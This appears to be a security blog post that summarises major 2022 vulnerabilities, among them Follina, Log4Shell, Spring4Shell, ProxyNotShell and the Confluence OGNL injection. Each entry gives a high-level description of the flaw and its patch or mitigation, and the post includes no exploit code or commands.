As technology continues to evolve, so too does the cyber-threat landscape. Keeping up with the latest security vulnerabilities is critical for security and technology teams. With the new year just around the corner, let’s look at some of the top security vulnerabilities organizations should be aware of from 2022.
Have a read and check for these vulnerabilities in your environment before these get picked up by threat actors (most were exploited in the wild, therefore, exploits exist) or by your penetration testing service provider.
Follina MSDT Bug (CVE-2022-30190)
This zero day flaw was identified in the built-in MS URL handlers (ms-msdt:) that would trigger the Microsoft Support Diagnostic Tool (MSDT) process used to run code on the target system. It named the vulnerability ‘Follina’ after the Italian city whose area code (0438) matched the numbers written on the malware sample file name(05-2022-0438.doc). This bug could be exploited even if Macros were turned off completely.
Guess what? A fix is to remove the registry entry causing this to happen. Easy-peasy!
This vulnerability from December 2021 ensured a busy start to 2022 for security teams. A zero-day vulnerability affected Log4j2 versions >= 2.0-beta9 and <= 2.15.0, which allowed an attacker to execute arbitrary code on a vulnerable system through specially crafted log messages. Successful exploitation (remote code execution) of this issue resulted in system-level privileges.
Ensure that you have upgraded to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7) or 2.17.1 (for Java 8 and later).
Spring4shell affects spring framework applications running JDK 9+ versions that use a data-finding functionality, allowing an attacker to run unauthenticated remote code execution (RCE). This issue was exploited in the wild and may still be the case.
This vulnerability was fixed in version 2.6.6. Follow here for the official early announcement.
BIG-IP iControl REST RCE(CVE-2022-1388)
The CVE-2022-1388 flaw enables remote code executions on systems using affected versions of F5 BIG-IP running iControl REST API and gives the attacker full control over these servers. The vulnerability priority rating for this bug was rated critical due to the public-facing nature of this service and the high rate of exploitability combined with the nature of the issue (authentication bypass).
Apply the vendor patch as released on May 4, 2022.
Google Chrome Use After Free in Animation (CVE-2022-0609)
In the affected Google chrome versions (prior to 98.0.4758.102), a remote attacker may exploit use after free in an animation via a crafted HTML page. A user after free is a type of memory corruption flaw in which a program continues to use a memory address after the associated memory has been freed (deallocated).
Four days later, Google released an update to this flaw.
ProxyNotShell (CVE-2022-41040 and CVE-2022-41082) in Exchange
The first of these two bugs, CVE-2022-41040, is an SSRF (Server-side request forgery) vulnerability. When exploited, it allows an authenticated user to remotely trigger the CVE-2022-41082, which allows RCE when PowerShell is accessible to a threat actor. Both vulnerabilities are part of the attack flow and require an authenticated session (standard email user credentials) for exploitation.
This vulnerability was addressed in November 2022 updates. A URL rewrite configuration can be achieved using this tool for on-premises MS Exchange servers.
Zimbra RCE (CVE-2022-27925 and CVE-2022-41352)
Attackers could exploit these vulnerabilities by sending malicious emails containing specially crafted attachments or links that allow them access into a vulnerable system’s files or user accounts. CVE-2022-27925 relates to an RCE vulnerability in ZCS that was patched in March 2022. CVE-2022-41352 related to unsafe usage of cpio utility where cpio is in use. In case of a pax utility in use (over cpio), the affected system can’t be exploited because amavisd (Zimbra’s AV engine) prefers pax, and pax is not vulnerable to this issue.
Follow Zimbra advisories and mitigation wiki page to install pax, which is the preferred utility over cpio.
Atlassian Confluence Vulnerability (CVE-2022-26134)
As this flaw affected all supported versions of the confluence server, this vulnerability was exploited in the wild benefitting cryptomining and other malware. Multiple proof of concepts were available on GitHub to exploit this critical unauthenticated OGNL injection Remote Code Execution vulnerability that affected the Confluence server and data center.
This bug was fixed in Confluence versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1. See the official security advisory for more details.
ZyXEL Vulnerability (CVE-2022-30525)
An unauthenticated remote command injection was identified by Rapid7 that affected Zyxel firewalls supporting ZTP (ATP, vpn, USG flex series). This flaw allowed an unauthenticated, remote attacker to achieve arbitrary code execution as a nobody user on the affected device.
Zyxel released a new firmware version ZLD V5.30 to fix this issue.
A patch management based on risk approach helps protect organizations against potential flaws that malicious actors are looking to exploit fast. You should ensure that such vulnerabilities are identified during your internal pen testing exercises and risk remediation plans are thoroughly discussed to leave a minimal window between identification and fix.
These are just a few of the many security vulnerabilities that organizations have faced throughout 2022. Still, they are among some of the most severe identified this year. Patch everything only exists in easy talks and point-and-click scanning reports, not in real networks.